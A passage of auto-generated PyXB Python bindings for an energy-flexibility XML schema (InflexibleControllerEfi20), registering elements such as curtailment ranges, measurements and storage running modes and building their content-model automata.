    symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'status')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 80, 6))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # 'debugInformation': optional trailing element; accepting provided cc_0 is satisfied.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_12._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'debugInformation')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 81, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # Linear transition chain: header -> instructionId -> status -> debugInformation.
    transitions = []
    transitions.append(fac.Transition(st_1, [ ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [ ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [ ]))
    st_2._set_transitionSet(transitions)
    # Self-loop on debugInformation increments cc_0 (bounded by max=1).
    transitions = []
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_0, True) ]))
    st_3._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_12._Automaton = _BuildAutomaton_44()
def _BuildAutomaton_45 ():
    # One-shot helper: build the automaton for CTD_ANON_13, then drop the
    # helper from the module namespace.
    global _BuildAutomaton_45
    del _BuildAutomaton_45
    import pyxb.utils.fac as fac
    # Content model is a single required 'header' element with no repetition.
    loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3)
    header_use = pyxb.binding.content.ElementUse(CTD_ANON_13._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), loc)
    header_state = fac.State(header_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    # No outgoing transitions: the model ends after the header.
    header_state._set_transitionSet([])
    return fac.Automaton([header_state], set(), False, containing_state=None)
# Attach the compiled content-model automaton to CTD_ANON_13.
CTD_ANON_13._Automaton = _BuildAutomaton_45()
# Register the single child element (instructionId) of CTD_ANON_14.
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'instructionId'), Identifier, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 108, 6)))
def _BuildAutomaton_46 ():
    # One-shot helper: build the automaton for CTD_ANON_14, then remove
    # this function from the module namespace.
    global _BuildAutomaton_46
    del _BuildAutomaton_46
    import pyxb.utils.fac as fac
    xsd_path = '/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd'
    # 'header' opens the sequence; final_update=None marks it non-accepting.
    header_use = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location(xsd_path, 24, 3))
    header_state = fac.State(header_use, is_initial=True, final_update=None, is_unordered_catenation=False)
    # 'instructionId' follows the header and terminates the content model.
    instr_use = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'instructionId')), pyxb.utils.utility.Location(xsd_path, 108, 6))
    instr_state = fac.State(instr_use, is_initial=False, final_update=set(), is_unordered_catenation=False)
    # header -> instructionId, then stop.
    header_state._set_transitionSet([fac.Transition(instr_state, [])])
    instr_state._set_transitionSet([])
    return fac.Automaton([header_state, instr_state], set(), False, containing_state=None)
# Attach the compiled content-model automaton to CTD_ANON_14.
CTD_ANON_14._Automaton = _BuildAutomaton_46()
# Register the repeatable curtailmentRange child of CurtailmentOption.
CurtailmentOption._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentRange'), CurtailmentRange, scope=CurtailmentOption, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 238, 3)))
def _BuildAutomaton_47 ():
    # One-shot helper: build the automaton for CurtailmentOption, then
    # delete this function from the module namespace.
    global _BuildAutomaton_47
    del _BuildAutomaton_47
    import pyxb.utils.fac as fac
    # Content model: one or more 'curtailmentRange' elements.
    loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 238, 3)
    range_use = pyxb.binding.content.ElementUse(CurtailmentOption._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentRange')), loc)
    range_state = fac.State(range_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    # Self-loop allows the element to repeat without bound.
    range_state._set_transitionSet([fac.Transition(range_state, [])])
    return fac.Automaton([range_state], set(), False, containing_state=None)
# Attach the compiled content-model automaton to CurtailmentOption.
CurtailmentOption._Automaton = _BuildAutomaton_47()

# Register the children of the anonymous complex type CTD_ANON_15
# (measurementTimestamp plus optional electricity/gas/heat measurements).
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'measurementTimestamp'), pyxb.binding.datatypes.dateTime, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 257, 6)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricityMeasurement'), CTD_ANON_6, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasMeasurement'), CTD_ANON_7, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatMeasurement'), CTD_ANON_8, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6)))
def _BuildAutomaton_48 ():
    # Build the FAC content-model automaton for CTD_ANON_15:
    # header, measurementTimestamp, then optional electricityMeasurement,
    # gasMeasurement and heatMeasurement in that order.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_48
    del _BuildAutomaton_48
    import pyxb.utils.fac as fac
    counters = set()
    # One 0..1 occurrence counter per optional measurement element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6))
    counters.add(cc_2)
    states = []
    # 'header': required first element; final_update=None means non-accepting.
    final_update = None
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'header')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 24, 3))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # 'measurementTimestamp': required; the document may end here.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'measurementTimestamp')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 257, 6))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # 'electricityMeasurement': optional; accepting when cc_0 is satisfied.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityMeasurement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 258, 6))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # 'gasMeasurement': optional; accepting when cc_1 is satisfied.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasMeasurement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 263, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # 'heatMeasurement': optional; accepting when cc_2 is satisfied.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatMeasurement')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 268, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # header leads unconditionally to the timestamp.
    transitions = []
    transitions.append(fac.Transition(st_1, [ ]))
    st_0._set_transitionSet(transitions)
    # After the timestamp any of the optional measurements may appear.
    transitions = []
    transitions.append(fac.Transition(st_2, [ ]))
    transitions.append(fac.Transition(st_3, [ ]))
    transitions.append(fac.Transition(st_4, [ ]))
    st_1._set_transitionSet(transitions)
    # From each measurement: self-loop increments its counter (capped at 1);
    # moving forward resets/finalizes the earlier counter.
    transitions = []
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_0, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_1, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_2, True) ]))
    st_4._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the compiled content-model automaton to CTD_ANON_15.
CTD_ANON_15._Automaton = _BuildAutomaton_48()
# Register the repeatable curtailmentProfileElement child of CurtailmentProfile.
CurtailmentProfile._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfileElement'), CurtailmentProfileElement, scope=CurtailmentProfile, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 331, 3)))
def _BuildAutomaton_49 ():
    # One-shot helper: build the automaton for CurtailmentProfile, then
    # delete this function from the module namespace.
    global _BuildAutomaton_49
    del _BuildAutomaton_49
    import pyxb.utils.fac as fac
    # Content model: one or more 'curtailmentProfileElement' elements.
    loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 331, 3)
    elt_use = pyxb.binding.content.ElementUse(CurtailmentProfile._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'curtailmentProfileElement')), loc)
    elt_state = fac.State(elt_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    # Self-loop allows unbounded repetition of the element.
    elt_state._set_transitionSet([fac.Transition(elt_state, [])])
    return fac.Automaton([elt_state], set(), False, containing_state=None)
CurtailmentProfile._Automaton = _BuildAutomaton_49()
def _BuildAutomaton_50 ():
    # Build the FAC content-model automaton for SequentialProfileAlternative:
    # an ordered sequence of three optional commodity groups —
    # electricity (profile | probability profile), gas, then heat.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_50
    del _BuildAutomaton_50
    import pyxb.utils.fac as fac
    counters = set()
    # One 0..1 occurrence counter per commodity group (electricity/gas/heat).
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 293, 3))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 297, 3))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 301, 3))
    counters.add(cc_2)
    states = []
    # Every group is optional, so all six states are initial states.
    # 'electricityProfile': accepting when cc_0 is satisfied.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # 'electricityProbabilityProfile': alternative form of the electricity group.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # 'gasProfile': gas group, governed by cc_1.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4))
    st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # 'gasProbabilityProfile': alternative form of the gas group.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4))
    st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # 'heatProfile': heat group, governed by cc_2.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4))
    st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # 'heatProbabilityProfile': alternative form of the heat group.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(SequentialProfileAlternative._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4))
    st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # Electricity states: staying within the group increments cc_0;
    # advancing to the gas or heat group finalizes cc_0.
    transitions = []
    transitions.append(fac.Transition(st_0, [ fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [ fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_0, [ fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [ fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_0, False) ]))
    st_1._set_transitionSet(transitions)
    # Gas states: same pattern with cc_1; only the heat group may follow.
    transitions = []
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_1, False) ]))
    st_3._set_transitionSet(transitions)
    # Heat states: last group; transitions stay within the group via cc_2.
    transitions = []
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_2, True) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_2, True) ]))
    st_5._set_transitionSet(transitions)
    # Third argument True: the automaton is nullable (empty content is valid).
    return fac.Automaton(states, counters, True, containing_state=None)
# Attach the compiled content-model automaton to SequentialProfileAlternative.
SequentialProfileAlternative._Automaton = _BuildAutomaton_50()
# Register the repeatable discreteRunningModeElement child of StorageDiscreteRunningMode.
StorageDiscreteRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningModeElement'), CTD_ANON_16, scope=StorageDiscreteRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 585, 5)))
def _BuildAutomaton_51 ():
    # One-shot helper: build the automaton for StorageDiscreteRunningMode,
    # then delete this function from the module namespace.
    global _BuildAutomaton_51
    del _BuildAutomaton_51
    import pyxb.utils.fac as fac
    # Content model: one or more 'discreteRunningModeElement' elements.
    loc = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 585, 5)
    mode_use = pyxb.binding.content.ElementUse(StorageDiscreteRunningMode._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningModeElement')), loc)
    mode_state = fac.State(mode_use, is_initial=True, final_update=set(), is_unordered_catenation=False)
    # Self-loop allows unbounded repetition of the element.
    mode_state._set_transitionSet([fac.Transition(mode_state, [])])
    return fac.Automaton([mode_state], set(), False, containing_state=None)
# Attach the compiled content-model automaton to StorageDiscreteRunningMode.
StorageDiscreteRunningMode._Automaton = _BuildAutomaton_51()

# Register the children of the anonymous complex type CTD_ANON_16
# (fillingRate followed by several optional numeric properties).
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 590, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), pyxb.binding.datatypes.decimal, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), pyxb.binding.datatypes.double, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10)))
def _BuildAutomaton_52 ():
    # Build the FAC content-model automaton for CTD_ANON_16:
    # required fillingRate followed by six optional elements
    # (runningCost, electricalPower, gasFlowRate, heatTemperature,
    # heatFlowRate, heatThermalPower) in that order.
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_52
    del _BuildAutomaton_52
    import pyxb.utils.fac as fac
    counters = set()
    # One 0..1 occurrence counter per optional element.
    cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10))
    counters.add(cc_0)
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10))
    counters.add(cc_1)
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10))
    counters.add(cc_2)
    cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10))
    counters.add(cc_3)
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10))
    counters.add(cc_4)
    cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10))
    counters.add(cc_5)
    states = []
    # 'fillingRate': required; the document may end immediately after it.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'fillingRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 590, 10))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # Each optional state is accepting provided its counter is satisfied.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'runningCost')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 591, 10))
    st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'electricalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 592, 10))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 593, 10))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 594, 10))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 595, 10))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_5, False))
    symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower')), pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 596, 10))
    st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_6)
    # fillingRate may be followed by any of the optional elements.
    transitions = []
    transitions.append(fac.Transition(st_1, [ ]))
    transitions.append(fac.Transition(st_2, [ ]))
    transitions.append(fac.Transition(st_3, [ ]))
    transitions.append(fac.Transition(st_4, [ ]))
    transitions.append(fac.Transition(st_5, [ ]))
    transitions.append(fac.Transition(st_6, [ ]))
    st_0._set_transitionSet(transitions)
    # For each optional state: the self-loop increments its own counter
    # (capped at 1); skipping ahead finalizes the counter instead.
    transitions = []
    transitions.append(fac.Transition(st_1, [ fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_0, False) ]))
    transitions.append(fac.Transition(st_6, [ fac.UpdateInstruction(cc_0, False) ]))
    st_1._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_2, [ fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_6, [ fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_3, [ fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_6, [ fac.UpdateInstruction(cc_2, False) ]))
    st_3._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_4, [ fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_3, False) ]))
    transitions.append(fac.Transition(st_6, [ fac.UpdateInstruction(cc_3, False) ]))
    st_4._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_5, [ fac.UpdateInstruction(cc_4, True) ]))
    transitions.append(fac.Transition(st_6, [ fac.UpdateInstruction(cc_4, False) ]))
    st_5._set_transitionSet(transitions)
    transitions = []
    transitions.append(fac.Transition(st_6, [ fac.UpdateInstruction(cc_5, True) ]))
    st_6._set_transitionSet(transitions)
    return fac.Automaton(states, counters, False, containing_state=None)
# Attach the compiled content-model automaton to CTD_ANON_16.
CTD_ANON_16._Automaton = _BuildAutomaton_52()
# Register the repeatable continuousRunningModeElement child of StorageContinuousRunningMode.
StorageContinuousRunningMode._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningModeElement'), CTD_ANON_17, scope=StorageContinuousRunningMode, location=pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 621, 5)))
def _BuildAutomaton_53 ():
    # One-shot helper: build the automaton for StorageContinuousRunningMode,
    # then delete this function from the module namespace.
    global _BuildAutomaton_53
    del _BuildAutomaton_53
    import pyxb.utils.fac as fac
    # Content model: one or more 'continuousRunningModeElement' elements.
